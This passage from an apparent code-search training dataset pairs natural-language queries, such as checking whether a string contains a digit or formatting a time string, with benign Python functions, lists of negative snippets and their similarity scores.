l.split()\n## print la\n if(len(la)==0 or la[0]=='#'):\n## print \"skipping\"\n 1\n elif(la[0]=='a'):\n## print \"reading alignment\"\n self.readalign(la[1:], filehandle)\n else:\n## print \"end of records\"\n return\n\n l=filehandle.readline()", "def get_open_source_from_table(\n table: Sequence[Sequence[bs4.element.Tag]],\n team: Team,\n side: str,\n) -> Sequence[OpenSource]:\n open_sources = []\n for row in table:\n anchor = row[0].div.p.span.a\n filename = anchor.text\n url = anchor['href']\n date = row[1].div.p.text\n uploader = row[2].div.p.text\n open_source = OpenSource(team, side, filename, url, date, uploader)\n open_sources.append(open_source)\n return open_sources", "def fa2tab(filename):\n from Bio import SeqIO\n fo = open(filename,\"r\")\n fout = open(filename+\".tab\",\"w\")\n for seq in SeqIO.parse(fo, \"fasta\"):\n SeqIO.write(seq,fout,\"tab\")\n fo.close()\n fout.close()", "def _read_tsv(cls, input_file):\n with open(input_file, \"r\", encoding=\"cp1252\") as f:\n pre_lines = f.readlines()\n post_lines = []\n for line in pre_lines:\n post_lines.append(line.strip().split(\"\\t\"))\n return post_lines" ]
[ "0.6074462", "0.5697214", "0.55812126", "0.55209875", "0.5477201", "0.54759246", "0.544581", "0.5430003", "0.54228246", "0.53985965", "0.5344914", "0.53337824", "0.5330407", "0.53107756", "0.5296276", "0.5268797", "0.5236354", "0.52124465", "0.52045405", "0.51980215", "0.5169326", "0.5152859", "0.5128566", "0.5108838", "0.5084797", "0.5075781", "0.50628656", "0.50589466", "0.50581294", "0.5049722", "0.5047329", "0.50366104", "0.5024075", "0.50131744", "0.5008518", "0.50076044", "0.50018334", "0.5000637", "0.49966136", "0.49946126", "0.49876893", "0.49854004", "0.49826992", "0.49671692", "0.4962198", "0.4956656", "0.4954674", "0.49491882", "0.49472946", "0.4946349", "0.4943583", "0.4940704", "0.49404335", "0.49396843", "0.49387303", "0.49360952", "0.49324617", "0.49322906", "0.49285012", "0.49273345", "0.49198857", "0.49093258", "0.49089092", "0.4899449", "0.4896975", "0.48932236", "0.48876038", "0.48816636", "0.48799342", "0.4879928", "0.4875115", "0.48743582", "0.48740986", "0.48731765", "0.4870399", "0.48678958", "0.4863766", "0.48613626", "0.48610517", "0.4852676", "0.48507884", "0.48402163", "0.48377332", "0.48355508", "0.4833364", "0.48322442", "0.4827234", "0.48261616", "0.4824331", "0.48231533", "0.4821661", "0.4809927", "0.48051935", "0.48047346", "0.4794403", "0.47891736", "0.47887775", "0.47822076", "0.47809225", "0.47759843", "0.47710618" ]
0.0
-1
Function that returns true if a string contains a number
def hasNumbers(inputString): return any(char.isdigit() for char in inputString)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __has_numbers(self, input_string):\n return bool(re.search(r'\\d', input_string))", "def has_number(any_string):\n return any(char.isdigit() for char in any_string)", "def has_num(text):\n return any(str.isdigit(c) for c in text)", "def is_number(s):\r\n try:\r\n int(s)\r\n return True\r\n except ValueError:\r\n return False", "def is_some_number(mystring):\n # print(Bcolors.cyan + re.findall(r\".*\\\\(.*)\", inspect.stack()[0][1])[0] + \" --- \"\n # + inspect.stack()[0][3] + \"()\" + Bcolors.ENDC)\n mystring = str(mystring)\n mystring = re.sub(\",\", \".\", mystring)\n try:\n if float(mystring):\n return True\n except ValueError:\n return False", "def is_number(s):\n try:\n int(s)\n return True\n except ValueError:\n return False", "def isnum(self, x):\n\n return x in '1234567890.-'", "def string_contains_digits(self, string):\n return bool(self.compiledDigitRegex.search(string))", "def _contains_number(text):\n return any((True for n in xrange(10) if str(n) in text))", "def is_number(string):\r\n try:\r\n float(string)\r\n return True\r\n except ValueError: return False", "def is_number_repl_isnumeric(s):\n return s.replace('.', '', 1).isnumeric()", "def isNumber(string):\r\n for char in string:\r\n charNum = ord(char)\r\n if (charNum < 48 or charNum > 57):\r\n return False\r\n return True", "def is_number(string):\n try:\n float(string)\n return True\n except ValueError:\n return False", "def isnumber(n):\r\n N = str(n)\r\n if N.isdigit():\r\n return True\r\n else:\r\n return False", "def is_number(c):\n return '0' <= c <= '9'", "def number_only(number):\n number = number.replace(' ', '')\n result = re.match(r\"^[0-9]+$\", number)\n if not result:\n return True\n return False", "def is_number(text):\n return text.lower() in AVRO_NUMBERS", "def is_valid_numeric(inString):\r\n return is_int(inString) or is_float(inString)", "def is_number_repl_isdigit(s):\n return s.replace('.', '', 1).isdigit()", "def only_numbers(string):\n for character in string[:-1]:\n if not (character.isdigit() or character in (',', ' ')): \n return False\n return True", "def is_number(str):\n\n # Local constants\n\n # Local variabes\n\n #****** start is_number() ******#\n\n try:\n float(str)\n return True\n except ValueError:\n return False", "def isNumber(word):\n try:\n int(word)\n return True\n except ValueError:\n return False", "def is_digit_regex(s: str) -> bool:\n if re.match(\"^\\d+?\\.\\d+?$\", s) is None:\n return s.isdigit()\n return True", "def is_number(s):\r\n try:\r\n float(s)\r\n return True\r\n except ValueError:\r\n return False", "def is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n return False", "def is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n return False", "def is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n return False", "def is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n return False", "def isNumeric(string, needHexPrefix):\n return (True)", "def is_number_regex(s):\n if re.match(\"^\\d+?\\.\\d+?$\", s) is None:\n return s.isdigit()\n return True", "def is_number_regex(s):\n if re.match(\"^\\d+?\\.\\d+?$\", s) is None:\n return s.isdigit()\n return True", "def is_int(str_val: str) -> bool:\n\n return not (len(str_val) == 0 or any([c not in \"0123456789\" for c in str_val]))", "def is_number_regex(s):\n if re_match('^\\d+?\\.\\d+?$', s) is None:\n return s.isdigit()\n return True", "def is_number(s: Any) -> bool:\n try:\n int(s)\n return True\n except ValueError:\n pass\n\n try:\n float(s)\n 
return True\n except ValueError:\n pass\n\n return False", "def checkifnumber(self, test_string):\r\n try:\r\n float(test_string)\r\n return(True)\r\n except ValueError:\r\n return(False)", "def numbers_check(string, logger_=_LOGGER):\n valid_regex_0 = r\"\\d\"\n valid_regex_1 = r\"_\\d+_\\d+_\"\n valid_regex_2 = r\"_\\d+_\"\n if not re.search(valid_regex_0, string):\n logger.log(\n level=\"warning\",\n message='There are no numbers in the string \"' + string + '\"',\n logger=logger_,\n )\n return string\n if re.search(valid_regex_1, string):\n return string\n elif re.search(valid_regex_2, string):\n return string\n else:\n logger.log(\n level=\"warning\",\n message='Numbers not in valid expression. Valid values are \"_(['\n '0-9]+)_([0-9]+)_\" or \"_([0-9]+)_\"',\n logger=logger_,\n )\n return string", "def _is_number(s) -> bool:\n try:\n float(s)\n except ValueError:\n return False\n else:\n return True", "def isNumber(s):\n try:\n float(s)\n return True\n except ValueError:\n return False", "def isNumber(s):\n\ttry:\n\t\tfloat(s)\n\t\treturn True\n\texcept ValueError:\n\t\treturn False", "def is_number(str):\n try:\n float(str)\n return True\n except ValueError as e:\n print(e)\n try:\n unicodedata.numeric(str)\n return True\n except (TypeError, ValueError) as e:\n print(e)\n return False", "def is_num(var):\n try:\n int(var)\n return True\n except ValueError:\n return False", "def has_number(string):\n numbers = '0123456789'\n for letter in string:\n if letter in numbers:\n return True\n\n # End of the loop, we still didn't see any numbers, else we \n # woud have exited the function\n print(\"Your password doesn't contain any number\")\n return False", "def is_num(n):\n return '{} is a number'.format(n)", "def check_int(s):\n if s[0] in ('-', '+'):\n return s[1:].isdigit()\n return s.isdigit()", "def isAllDigits(self, word):\n return ((re.match('^\\d+$', word)) != None)", "def is_number_char(c: str) -> bool:\n return c.isdigit() or c == \".\"", "def must_contain_digit(cell):\n # Check if it's nan first\n if check_empty(cell):\n return True\n return not bool(re.search(\"\\d\", str(cell)))", "def is_number(self,s):\n try:\n float(s.replace(\" \", \"\"))\n return True\n except ValueError:\n return False", "def IsNumber(s):\n try:\n v = float(s)\n return True\n except ValueError:\n return False", "def _isnumber_with_thousands_separator(string):\n try:\n string = string.decode()\n except (UnicodeDecodeError, AttributeError):\n pass\n\n return bool(re.match(_float_with_thousands_separators, string))", "def isNumber(st):\n\treturn st.replace('.','',1).isdigit()", "def is_int(string:str) -> bool:\n try:\n int(string)\n return True\n except:\n return False", "def digitsOnly(s):\n return (s == ''.join([c for c in s if c in string.digits]))", "def only_int(p):\r\n if p.isdigit():\r\n return True\r\n return False", "def isnumeric(number):\n try:\n float(number)\n return True\n except (TypeError, ValueError):\n return False", "def isNumber(self, s):\n try:\n tmp = float(s)\n return True\n except:\n return False", "def checknum(val):\n\n if len(val) == 0:\n return False\n\n for i in range(len(val)):\n if not val[i].isdigit():\n return False\n\n return True", "def is_int(string):\n try:\n int(string)\n return True\n except ValueError:\n return False", "def is_number(s: Union[str, int, float]):\n if isinstance(s, str) and s.lower() == \"nan\":\n return True\n try:\n float(s)\n return True\n except ValueError:\n return False", "def IsNumeric(text):\n try:\n _ = float(text)\n except ValueError:\n return 
0\n else:\n return 1", "def is_number(value):\n try:\n int(value)\n return True\n except (ValueError, TypeError):\n return False", "def is_number(num):\n try:\n float(num)\n return True\n except ValueError:\n return False", "def is_num_char(x):\n return ord('0') <= ord(x) <= ord('9')", "def is_number(number):\n try:\n float(number)\n return True\n except ValueError:\n return False", "def string_is_digit(string):\n valids = set([46, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57])\n plus_minus = set([43, 45])\n characters = list(string)\n\n #First character can be number or +/-\n if ord(characters[0]) not in valids.union(plus_minus):\n return False\n \n #Iterate to check all other characters\n for character in string[1:]:\n value = ord(character)\n if value not in valids:\n return False\n elif value == 46: # 46 = '.'\n valids.remove(46) # Only one period allowed\n return True", "def isnumber(x):\n try:\n float(x)\n return True\n except ValueError:\n return False", "def isAlphaNumeric(string):\n return (True)", "def is_number(n):\n\ttry:\n\t\tfloat(n)\n\t\treturn True\n\texcept ValueError:\n\t\treturn False", "def ascii_numeric(s: str) -> bool:\n return frozenset(s).issubset(_ascii_n)", "def isindex(str):\n try:\n int(str)\n return True\n except ValueError:\n return False", "def check_for_integer(number):\r\n \r\n try:\r\n int(number) \r\n return True\r\n except ValueError:\r\n return False", "def validate_number(input_data):\n if input_data.startswith('-'):\n return input_data.i\n else:\n return False", "def __set_has_numeric(text=str):\n reg_ex = constants.NUMERIC_REG_EX_PATTERN\n if reg_ex.search(text) is None:\n return text\n return reg_ex.sub(constants.QUESTION_HAS_NUMERIC_KEY, text)", "def is_integer(self, string):\n try:\n return int(string)\n except:\n return False", "def is_positive_integer(string:str) -> bool:\n try:\n value = int(string)\n return value >= 0\n except ValueError:\n return False", "def _isDecimalNumber(strWord):\n return NumberFormula.DECIMALNUMBERREGEX.match(strWord) != None", "def is_numeric(value):\n return any([\n type(value) is str and value.isnumeric(),\n hasattr(value, 'is_integer') and value.is_integer(),\n type(value) is int,\n ])", "def is_digit_pound_star(string):\n return all([char.isdigit() or char in ('#', '*') for char in string])", "def slug_is_numerical(slug):\r\n try:\r\n float(slug)\r\n except ValueError:\r\n return False\r\n\r\n return True", "def isNumber(number):\n try:\n # Try to cast the string\n int(number)\n # The cast was successful\n return True\n # The cast was unsuccessful, the string is not a number\n except ValueError as err:\n # Write the exception in logging\n logging.exception(str(err))\n return False", "def _isnumber(string):\n if not _isconvertible(float, string):\n return False\n elif isinstance(string, (str, bytes)) and (\n math.isinf(float(string)) or math.isnan(float(string))\n ):\n return string.lower() in [\"inf\", \"-inf\", \"nan\"]\n return True", "def is_number_tryexcept(s):\n try:\n float(s)\n return True\n except ValueError:\n return False", "def __is_int(self,string):\r\n try: \r\n int(string)\r\n return True\r\n except ValueError:\r\n return False", "def is_number_tryexcept(s):\n try:\n float(s)\n return True\n except ValueError:\n return False", "def istele(number):\n if number[:3] == '140':\n return True\n return False", "def isInt(s):\n try:\n int(s)\n return True\n except ValueError:\n return False", "def isint(s):\n try:\n x = int(s)\n return True\n except:\n return False", "def _is_num(w):\n symbols = list(w)\n for s in 
symbols:\n if s in string.digits:\n return '<NUM>'\n return w", "def is_number(number):\n if type(number) == type(1) or type(number) == type(0.1) or type(number) == type('') or type(u''):\n try:\n float(number)\n return True\n except ValueError:\n return False\n except TypeError:\n return False\n else:\n return False", "def is_number(value):\n try:\n float(value)\n return True\n except ValueError:\n return False", "def isFloat(string):\n return all(c in \"0123456789.\" for c in string)", "def is_number(value):\n try:\n float(value.replace(',', ''))\n except ValueError:\n return False\n return True", "def is_valid_integer(string_object: str):\n if string_object[0] == '-':\n return string_object[1:].isdigit()\n return string_object.isdigit()", "def input_validation(input_: str) -> bool:\n return fullmatch('[1-9]', input_) is not None", "def CheckNumber(userInput):\n try:\n float(userInput)\n return True\n except(ValueError):\n return False", "def isdigit(a):\n return _vec_string(a, bool_, 'isdigit')", "def is_numeric(val):\n if \\\n isinstance(val, int) or \\\n isinstance(val, float):\n return True\n elif \\\n isinstance(val, str) and \\\n val.isdigit():\n return True\n else:\n return False", "def isInt(string):\n try: int(string)\n except ValueError: return 0\n else: return 1", "def is_numeric(s):\n \n if s == False or s == None or s == \"\" or s == True:\n return False\n \n try:\n float(s)\n return True\n except (ValueError, TypeError):\n return False", "def represents_int(s):\n try:\n int(s)\n return True\n except ValueError:\n return False" ]
[ "0.86861813", "0.83668447", "0.82383734", "0.7930955", "0.79304606", "0.7924505", "0.78930366", "0.78647584", "0.77653086", "0.7743263", "0.7714202", "0.7706238", "0.77058214", "0.77046204", "0.77044505", "0.7690902", "0.766317", "0.7639565", "0.7527607", "0.7527464", "0.75087285", "0.74870706", "0.74678373", "0.74541515", "0.7438179", "0.74299467", "0.74299467", "0.74299467", "0.7428709", "0.740295", "0.740295", "0.7378684", "0.73763984", "0.7357792", "0.7337901", "0.73187816", "0.72719896", "0.72591233", "0.7254111", "0.72287524", "0.7228211", "0.7217498", "0.7202498", "0.71521497", "0.7145471", "0.7142101", "0.71344715", "0.71325696", "0.71054", "0.7103199", "0.7102365", "0.7035428", "0.7026263", "0.70180136", "0.69936544", "0.69815475", "0.6976326", "0.69481725", "0.6939355", "0.6938498", "0.69374955", "0.6925218", "0.691365", "0.68837976", "0.6876853", "0.68756247", "0.6867582", "0.6863585", "0.685189", "0.6847657", "0.682679", "0.6822987", "0.6820883", "0.68174416", "0.68153614", "0.6802655", "0.6796678", "0.6765303", "0.67582476", "0.670378", "0.66909367", "0.66698235", "0.66597223", "0.66495", "0.6643994", "0.66366434", "0.66207963", "0.66189146", "0.66148144", "0.66144764", "0.661039", "0.66019887", "0.65823054", "0.6552871", "0.65489084", "0.6545662", "0.6539343", "0.652843", "0.6523077", "0.6505182" ]
0.8393111
1
Small function to change time format. Used for make_time func
def tedoius_time(time_string):
    start = ['start', 'begin', 'beginning', 'head', 'first']
    end = ['slut', 'end', 'tail', 'finish', 'finito', 'fin', 'done', 'finished']
    if time_string.lower() in start:
        time_string = "00:00:00"  # We need this exact string for later
    elif time_string.lower() in end:
        return time_string
    elif len(time_string) == 1:
        time_string = f"00:00:0{time_string}"
    elif len(time_string) == 2:
        time_string = f"00:00:{time_string}"
    elif len(time_string) == 3:
        time_string = f"00:00{time_string}"
    elif len(time_string) == 4:
        time_string = f"00:0{time_string}"
    elif len(time_string) == 5:
        time_string = f"00:{time_string}"
    elif len(time_string) == 6:
        time_string = f"00{time_string}"
    elif len(time_string) == 7:
        time_string = f"0{time_string}"
    elif len(time_string) > 8:
        raise ValueError('Time string too long!')
    return time_string
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def format_time(self, time):\n hh = time[0:2]\n mm = time[2:4]\n ss = time[4:]\n return \"%s:%s:%s UTC\" % (hh,mm,ss)", "def time_hack(self):\n now = datetime.datetime.now()\n monthnames = ['jan', 'feb', 'mar', 'apr', 'may', 'jun',\n 'jul', 'aug', 'sep', 'oct', 'nov', 'dec']\n month = monthnames[now.month - 1].capitalize()\n return ('[%02d/%s/%04d:%02d:%02d:%02d.%06d]' %\n (now.day, month, now.year, now.hour, now.minute, now.second, now.microsecond))", "def __format_time(in_time):\n logging.debug(\"in_time = %s\", in_time)\n out = in_time.strftime(\"%a, %d %b %Y %H:%M:%S %z+0000\")\n logging.debug(\"out = %s, out\")\n return out", "def format_time(self, data):\r\n if self.datetime_formatting == 'rfc-2822':\r\n return format_time(data)\r\n\r\n return data.isoformat()", "def friendly_time(time=None):\n if time is None:\n time = pass_good_until()\n return time.strftime(config.TIME_PRINT_FORMAT)", "def time_helper(seperator = '_', to_sec = False):\n localtime = time.asctime(time.localtime(time.time()))\n if to_sec:\n return time.strftime(\"%Y\" + seperator + \"%m\" + seperator + \"%d\" + seperator + \"%H\" + seperator + \"%M\" + seperator + \"%S\", time.localtime()) \n return time.strftime(\"%Y\" + seperator + \"%m\" + seperator + \"%d\" + seperator + \"%H\" + seperator + \"%M\", time.localtime())", "def get_time_str():\n return time.strftime(time_fmt)", "def format_time(t):\r\n # again, workaround dateformat input requirement\r\n dt = aware_datetime(2000, 1, 1, t.hour, t.minute, t.second)\r\n return dateformat.format(dt, 'H:i:s O')", "def format_time(time):\n hour, minute = time.hour, time.minute\n period = \"am\" if hour < 12 or hour == 24 else \"pm\"\n hour = hour % 12\n if hour == 0:\n hour = 12\n return \":t:\" + str(hour) + \":\" + str(minute).rjust(2, \"0\") + period", "def format_time(value):\n if value:\n time = dateutil.parser.parse(value)\n # pylint: disable=E1101\n return time.strftime(\"%I:%M%p\")\n else:\n return ''", "def format_time(self, time):\n hours = time // 3600\n time = time - hours*3600\n minutes = time // 60\n seconds = time - minutes*60\n return ('%d:%d:%d' %(hours, minutes, seconds))", "def format_time(t):\n m, s = divmod(t, 60)\n h, m = divmod(m, 60)\n if h:\n return f\"{h:2.0f}hr {m:2.0f}min {s:4.1f}s\"\n elif m:\n return f\"{m:2.0f}min {s:4.1f}s\"\n else:\n return f\"{s:4.1f}s\"", "def standardTime(time):\n time = localize(time)\n return time.strftime('%m/%d/%Y').lstrip('0') + ' @ ' + time.strftime('%I:%M%p').lstrip('0') if time is not None else ''", "def format(t):\r\n \r\n tenths_of_seconds = t % 10\r\n t /= 10\r\n seconds = t % 60\r\n minutes = t / 60\r\n \r\n # Format String: http://www.codeskulptor.org/docs.html#string-formatting\r\n formatted_time = '%(minutes)0d:%(seconds)02d.%(ts)0d' % \\\r\n {\r\n \"minutes\": minutes, \r\n \"seconds\": seconds, \r\n \"ts\": tenths_of_seconds\r\n }\r\n \r\n return formatted_time", "def formatTime(time):\n\n return datetime.strptime(time, \"%d/%m/%Y %H:%M:%S\").strftime(\"%a, %d/%m/%Y %H:%M:%S\")", "def timeConvert(time):\n\n FMTin = '%Y-%m-%d %H:%M:%S'\n FMTout = '%m/%d/%y'\n\n return datetime.strftime(datetime.strptime(time, FMTin), FMTout)", "def format_time(value: int) -> str:\n return (datetime(1970, 1, 1) + timedelta(milliseconds=value)).strftime('%Y%m%d%H%M%S')", "def format_time(value: float) -> str:\n if value <= 0.01:\n return f\"{value * 1000000:.0f}us\"\n elif value <= 0.1:\n return f\"{value * 1000:.1f}ms\"\n elif value > 172800:\n return f\"{value / 86400:.2f}days\"\n elif value > 86400:\n return f\"{value 
/ 86400:.2f}day\"\n elif value > 1800:\n return f\"{value / 3600:.2f}hr\"\n elif value > 60:\n return f\"{value / 60:.2f}min\"\n return f\"{value:.2f}s\"", "def format_time(t: float):\n if t >= 60:\n return f\"{round(t / 60.0, 2)} mins\"\n else:\n return f\"{round(t, 2)} secs\"", "def _tp_fmt(var):\n if type(var) is datetime:\n if var.hour == 0 and var.minute == 0:\n str_out = var.strftime('%Y-%m-%d')\n else:\n str_out = var.strftime('%Y-%m-%d %H:%M')\n else:\n str_out = var\n return str_out", "def get_time_human_readable():\n return time.strftime(\"%A, %H:%M\")", "def format_time(time_value):\n if time_value is None:\n return \"Never\"\n else:\n result = \"%s UTC\" % (time.asctime(time.gmtime(time_value)))\n # Windows uses a leading 0 on the day of month field, which makes it different behavior from Linux\n # which uses a space in place of the leading 0. For tests, we need this to behave the same, so we spend\n # the small effort here to make it work. At least, that leading 0 is always in the same place.\n if result[8] == \"0\":\n result = \"%s %s\" % (result[:8], result[9:])\n return result", "def format_time(timestamp=None, format=r\"%Y%m%d-%H%M%S\"):\n time_str = time.strftime(format, time.localtime(timestamp if timestamp else time.time()))\n return time_str", "def _hour_to_time(num: int):\n return datetime.datetime.now().replace(hour=num).strftime(\"%-I %p\")", "def to_time_format(timestamp: int, fmt: str = '%Y-%m-%d %H:%M:%S'):\n return datetime.fromtimestamp(int(timestamp) // 1000).strftime(fmt)", "def _time_str(self):\n try:\n if not self._time:\n raise ValueError\n format_ = '%a, %d %b %Y %H:%M:%S'\n return datetime.fromtimestamp(float(self._time)).strftime(format_)\n except ValueError:\n return plastic_date()", "def formatTime(self, record, datefmt=None):\n ct = self.converter(record.created)\n _format = datefmt or self.default_time_format\n\n s = ct.strftime(_format)\n\n return s", "def get_time() -> str:\r\n return time.strftime(TIMEFORMAT)", "def _format_time(seconds):\n hrs = seconds // 3600\n seconds -= 3600 * hrs\n mins = seconds // 60\n seconds -= 60 * mins\n return '%02dh%02dm%02ds' % (hrs, mins, seconds)", "def format_time(time: int) -> str:\n minute = time % 100\n hour = int(time / 100)\n\n if hour >= 12:\n if hour > 12:\n hour = hour -12\n response = f'{hour} {minute} pm'\n else:\n response = f'{hour} {minute} am'\n\n return response", "def formatted_time() -> datetime.datetime:\r\n return datetime.datetime.now()", "def prepareTime(time):\n time = str(time)\n time = '000000'+time\n time = time[len(time)-6:]\n return time", "def on_action_set_time_format(self, content):\n self.set_time_format(content['time_format'])", "def render_time(dt):\n return dt.strftime('%H:%M:%S')", "def custom_strftime(format, t): \n return t.strftime(format).replace(\"{S}\", str(t.day) + suffix(t.day))", "def test_make_time_str(self):\n\n s = custom_date.make_time_str(\"23\", \"15\", \"01\", \"100\")\n self.assertEqual(s, \"23:15:01.100\")", "def now_short(_format=\"%Y%m%d-%H%M%S\"):\n timeString = time.strftime(_format, time.localtime()) + \"\\t\"\n return timeString", "def format_time(self, record):\r\n record.created = time.strftime(\"%d.%m.%Y %H:%M:%S\", time.localtime(record.created))", "def break_time(t='now', time_format=''):\n # TODO: should be able to handle a time range\n return parse_time(t, time_format).strftime(\"%Y%m%d_%H%M%S\")", "def format_time(s):\n s = int(s)\n m, s = divmod(s, 60)\n h, m = divmod(m, 60)\n return f'{h:02d}h{m:02d}m{s:02d}s'", "def format(t):\n tenths = t % 
10\n seconds = (t // 10) % 60\n minutes = (t // 10) // 60\n if seconds < 10:\n seconds_str = '0' + str(seconds)\n else:\n seconds_str = str(seconds)\n t_string = str(minutes) + ':' + seconds_str + '.' + str(tenths)\n return t_string", "def friendly_time(time=None):\n if time is None:\n time = pass_good_until(config.HOURS_TO_GRANT_ACCESS, 7)\n return time.strftime(config.TIME_PRINT_FORMAT)", "def now_short(_format=\"%Y%m%d-%H%M%S\"):\n return time.strftime(_format, time.localtime()) + \"\\t\"", "def _format_time(record, datefmt=None):\n time_tuple = time.localtime(record.created)\n tz_name = time.tzname[time_tuple.tm_isdst]\n return '%(date_time)s-%(millis)03d-%(tz_name)s' % dict(\n date_time=time.strftime('%Y%m%d-%H%M%S', time_tuple),\n millis=record.msecs,\n tz_name=tz_name,\n )", "def time(value, arg=None):\n if value in (None, ''):\n return ''\n try:\n return formats.time_format(value, arg)\n except (AttributeError, TypeError):\n try:\n return time_format(value, arg)\n except (AttributeError, TypeError):\n return ''", "def _time_to_pretty_string(time_object: time) -> str:\n if time_object.second != 0:\n pretty_format = \"%I:%M:%S %p\"\n elif time_object.minute != 0:\n pretty_format = \"%I:%M %p\"\n elif time_object.minute is not None:\n pretty_format = \"%I %p\"\n pretty_string = time.strftime(time_object, pretty_format)\n\n # We do not want leading zero so 09 AM -> 9 AM\n if pretty_string[0] == '0':\n return pretty_string[1:]\n else:\n return pretty_string", "def nowStr(time=None):\n if time is None:\n time = datetime.now().time()\n if time.minute < 10:\n return time.strftime(\"%H ноль %m\")\n else:\n return time.strftime(\"%H %M\")", "def user_friendly_time(s):\n s = int(s)\n if s < 60:\n return \"{}s\".format(s)\n\n m = s // 60\n s = s % 60\n if m < 60:\n return \"{}m {}s\".format(m, s)\n\n h = m // 60\n m = m % 60\n if h < 24:\n return \"{}h {}m {}s\".format(h, m, s)\n\n d = h // 24\n h = h % 24\n return \"{}d {}h {}m {}s\".format(d, h, m, s)", "def set_time_format(self, time_format):\n # XXX make sure Python's and Qt's format strings are the\n # same, or convert between the two.\n self.widget().setDisplayFormat(time_format)", "def default_time_format(self):\n if self.cluster.cassandra_version() < LooseVersion('3.4'):\n logger.debug('Using legacy time format for version ' + str(self.cluster.cassandra_version()))\n self._default_time_format = '%Y-%m-%d %H:%M:%S%z'\n else:\n logger.debug('Using latest time format for version ' + str(self.cluster.cassandra_version()))\n self._default_time_format = '%Y-%m-%d %H:%M:%S.%f%z'\n\n return self._default_time_format", "def usformat(date):\r\n return date.strftime('%m-%d-%Y %H:%M:%S')", "def time_str(num):\n if num > 3600:\n return \"%0.2f hrs\" % (num / 3600)\n elif num > 60:\n return \"%0.2f mins\" % (num / 60)\n else:\n return \"%d seconds\" % num", "def time2shortstr(time):\n return time.strftime(MEM_SHORT_TIME_FORMAT)", "def printTime(t):\n if t < 2 * MINUTE:\n return \"%d seconds\" % (t / SECOND)\n if t < 5 * HOUR:\n return \"%d minutes\" % (t / MINUTE)\n if t < 3 * DAY:\n return \"%d hours\" % (t / HOUR)\n if t < YEAR:\n return \"%d days\" % (t / DAY)\n if (t % YEAR) == 0:\n return \"%d years\" % (t / YEAR)\n else:\n return \"%5.1f years\" % (t / YEAR)", "def format_time(self, record):\n record.dbtime = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(record.created))\n return", "def _external_time_format(int_time):\n simple_iso_time = True\n if simple_iso_time:\n ext_time = int_time.replace(tzinfo=SimpleUtc()).isoformat()\n else:\n 
ext_time = int_time.isoformat() + \"Z\"\n return ext_time", "def normalise_time(time_str):\n\n hour = time_str.split(\":\")[0]\n if int(hour) >= 24:\n normalised_hour = int(hour) % 24\n return time_str.replace(hour, f\"{normalised_hour:02}\")\n\n return time_str", "def timestamp(style=False):\r\n\r\n if not style:\r\n return time.strftime('%H:%M:%S%p %D', time.localtime())\r\n else:\r\n return time.strftime(style, time.localtime())", "def format_time(self, record):\n record.dbtime = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(record.created))", "def transform_time(t):\n if t is None:\n return None\n elif isinstance(t, basestring):\n return t\n\n dt = datetime.fromtimestamp(t, UTC())\n return dt.strftime('%Y-%m-%dT%H:%M:%S%z')", "def formatCurrTime(fmt=\"%H:%M:%S\"):\n assert fmt is not None, \"The format is None\"\n return strftime(fmt)", "def convert_time(slog_time_str):\n \n base_time = datetime.datetime(2007, 1, 1)\n delta = datetime.timedelta(0, float(slog_time_str))\n \n timestamp = base_time + delta\n taml_dtg = timestamp.strftime('%Y-%m-%dT%H:%M:%S')\n return taml_dtg", "def test_format_time():\n number = random.randint(10000, 99999)\n formatted_number = race.format_time(str(number))\n assert type(formatted_number) == str\n assert \":\" in formatted_number and \".\" in formatted_number", "def converttime(time, currentformat, newformat):\n\n # Define conversion dictionary\n conversions = {\n \"milliseconds\": {\n \"milliseconds\": \"time\",\n \"seconds\": \"time / 1000\",\n \"minutes\": \"time / 1000 / 60\",\n \"hours\": \"time / 1000 / 60 / 60\",\n \"days\": \"time / 1000 / 60 / 60 / 24\",\n \"weeks\": \"time / 1000 / 60 / 60 / 24 / 7\",\n \"fortnights\": \"time / 1000 / 60 / 60 / 24 / 14\",\n \"years\": \"time / 1000 / 60 / 60 / 24 / 365\",\n \"decades\": \"time / 1000 / 60 / 60 / 24 / 365 / 10\",\n \"centuries\": \"time / 1000 / 60 / 60 / 24 / 365 / 100\",\n \"millenniums\": \"time / 1000 / 60 / 60 / 24 / 365 / 1000\"\n },\n \"seconds\": {\n \"milliseconds\": \"time * 1000\",\n \"seconds\": \"time\",\n \"minutes\": \"time / 60\",\n \"hours\": \"time / 60 / 60\",\n \"days\": \"time / 60 / 60 / 24\",\n \"weeks\": \"time / 60 / 60 / 24 / 7\",\n \"fortnights\": \"time / 60 / 60 / 24 / 14\",\n \"years\": \"time / 60 / 60 / 24 / 365\",\n \"decades\": \"time / 60 / 60 / 24 / 365 / 10\",\n \"centuries\": \"time / 60 / 60 / 24 / 365 / 100\",\n \"millenniums\": \"time / 60 / 60 / 24 / 365 / 1000\"\n },\n \"minutes\": {\n \"milliseconds\": \"time * 60 * 1000\",\n \"seconds\": \"time * 60\",\n \"minutes\": \"time\",\n \"hours\": \"time / 60\",\n \"days\": \"time / 60 / 24\",\n \"weeks\": \"time / 60 / 24 / 7\",\n \"fortnights\": \"time / 60 / 24 / 14\",\n \"years\": \"time / 60 / 24 / 365\",\n \"decades\": \"time / 60 / 24 / 365 / 10\",\n \"centuries\": \"time / 60 / 24 / 365 / 100\",\n \"millenniums\": \"time / 60 / 24 / 365 / 1000\"\n },\n \"hours\": {\n \"milliseconds\": \"time * 60 * 60 * 1000\",\n \"seconds\": \"time * 60 * 60\",\n \"minutes\": \"time * 60\",\n \"hours\": \"time\",\n \"days\": \"time / 24\",\n \"weeks\": \"time / 24 / 7\",\n \"fortnights\": \"time / 24 / 14\",\n \"years\": \"time / 24 / 365\",\n \"decades\": \"time / 24 / 365 / 10\",\n \"centuries\": \"time / 24 / 365 / 100\",\n \"millenniums\": \"time / 24 / 365 / 1000\"\n },\n \"days\": {\n \"milliseconds\": \"time * 24 * 60 * 60 * 1000\",\n \"seconds\": \"time * 24 * 60 * 60\",\n \"minutes\": \"time * 24 * 60\",\n \"hours\": \"time * 24\",\n \"days\": \"time\",\n \"weeks\": \"time / 7\",\n \"fortnights\": 
